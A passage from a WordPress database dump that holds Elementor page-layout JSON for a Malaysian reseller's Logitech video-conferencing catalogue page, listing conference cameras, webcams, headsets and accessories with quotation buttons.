Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5485,2936,'_elementor_version','0.4'),(5488,2928,'_oembed_60f8adc5a1980b33d7a8c7ee2aeea8b2','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/tD_tmRMN2OA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5489,2928,'_oembed_time_60f8adc5a1980b33d7a8c7ee2aeea8b2','1551666193'),(5490,2937,'_wp_page_template','template-fullwidth.php'),(5491,2937,'_elementor_edit_mode','builder'),(5492,2937,'_elementor_template_type','post'),(5493,2937,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 